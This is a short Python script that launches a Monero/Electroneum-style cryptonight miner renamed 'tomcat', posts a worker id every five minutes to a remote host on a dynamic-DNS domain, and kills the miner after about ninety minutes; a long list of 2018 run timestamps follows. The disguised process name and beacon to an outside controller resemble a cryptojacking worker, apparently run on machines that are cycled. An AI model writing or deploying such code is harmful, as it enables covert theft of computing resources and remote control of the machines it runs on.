import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:05.234883
#2018-02-17 16:44:07.288594
#2018-02-17 18:33:06.394124
#2018-02-17 20:21:04.995740
#2018-02-17 22:08:01.334199
#2018-02-17 23:52:06.785917
#2018-02-18 01:43:04.045790
#2018-02-18 03:31:06.271596
#2018-02-18 05:18:06.556524
#2018-02-18 07:10:07.597081
#2018-02-18 08:58:05.759206
#2018-02-18 10:45:07.318649
#2018-02-18 12:32:07.455594
#2018-02-18 14:19:05.368884
#2018-02-18 16:09:04.408749
#2018-02-18 17:58:06.070548
#2018-02-18 19:45:07.520304
#2018-02-18 21:29:01.652056
#2018-02-18 23:18:04.789057
#2018-02-19 01:06:04.342424
#2018-02-19 02:52:02.121810
#2018-02-19 04:38:06.914491
#2018-02-19 06:23:02.119760
#2018-02-19 08:12:03.654834
#2018-02-19 10:02:03.847571
#2018-02-19 11:51:08.191544
#2018-02-19 13:38:08.557983
#2018-02-19 15:27:04.581211
#2018-02-19 17:15:08.198257
#2018-02-19 19:03:09.558920
#2018-02-19 20:50:07.296652
#2018-02-19 22:41:04.063417
#2018-02-20 00:24:07.382469
#2018-02-20 02:13:03.631958
#2018-02-20 04:04:05.554425
#2018-02-20 05:47:06.853042
#2018-02-20 07:33:02.125504
#2018-02-20 09:18:06.883422
#2018-02-20 11:03:10.091200
#2018-02-20 12:51:05.711649
#2018-02-20 14:36:08.316557
#2018-02-20 16:21:01.406614
#2018-02-20 18:07:10.747302
#2018-02-20 19:59:07.149080
#2018-02-20 21:47:05.087802
#2018-02-20 23:28:06.266266
#2018-02-21 01:13:05.477837
#2018-02-21 02:59:07.866916
#2018-02-21 04:48:02.103213
#2018-02-21 06:38:06.180406
#2018-02-21 08:26:03.544798
#2018-02-21 10:12:04.398486
#2018-02-21 12:02:09.636591
#2018-02-21 13:51:01.737738
#2018-02-21 15:35:10.021964
#2018-02-21 17:24:07.454421
#2018-02-21 19:13:08.457128
#2018-02-21 21:01:03.880095
#2018-02-21 22:49:03.908072
#2018-02-22 00:39:07.720670
#2018-02-22 02:27:04.714456
#2018-02-22 04:14:06.195963
#2018-02-22 05:59:07.084287
#2018-02-22 07:46:05.916927
#2018-02-22 09:34:06.952645
#2018-02-22 11:20:09.278837
#2018-02-22 13:07:06.780547
#2018-02-22 14:54:08.722605
#2018-02-22 16:40:06.931372
#2018-02-22 18:27:10.183580
#2018-02-22 20:20:11.473487
#2018-02-22 22:05:09.076690
#2018-02-22 23:51:07.182079
#2018-02-23 01:40:10.141007
#2018-02-23 03:26:07.465507
#2018-02-23 05:12:06.318451
#2018-02-23 06:58:02.093258
#2018-02-23 08:48:01.466741
#2018-02-23 11:10:07.115035
#2018-02-23 13:04:09.813779
#2018-02-23 14:48:10.393811
#2018-02-23 16:38:11.152133
#2018-02-23 18:26:02.039290
#2018-02-23 20:10:08.283659
#2018-02-23 22:00:10.255662
#2018-02-23 23:49:05.489609
#2018-02-24 01:38:06.092844
#2018-02-24 03:27:05.846307
#2018-02-24 05:12:07.790096
#2018-02-24 07:00:08.466008
#2018-02-24 08:50:07.810497
#2018-02-24 10:58:03.672045
#2018-02-24 12:46:07.065570
#2018-02-24 14:35:06.993269
#2018-02-24 16:21:06.889188
#2018-02-24 18:15:08.165919
#2018-02-24 20:01:07.642853
#2018-02-24 21:44:01.556530
#2018-02-25 01:59:07.663496
#2018-02-25 05:54:03.657588
#2018-02-25 11:38:05.221317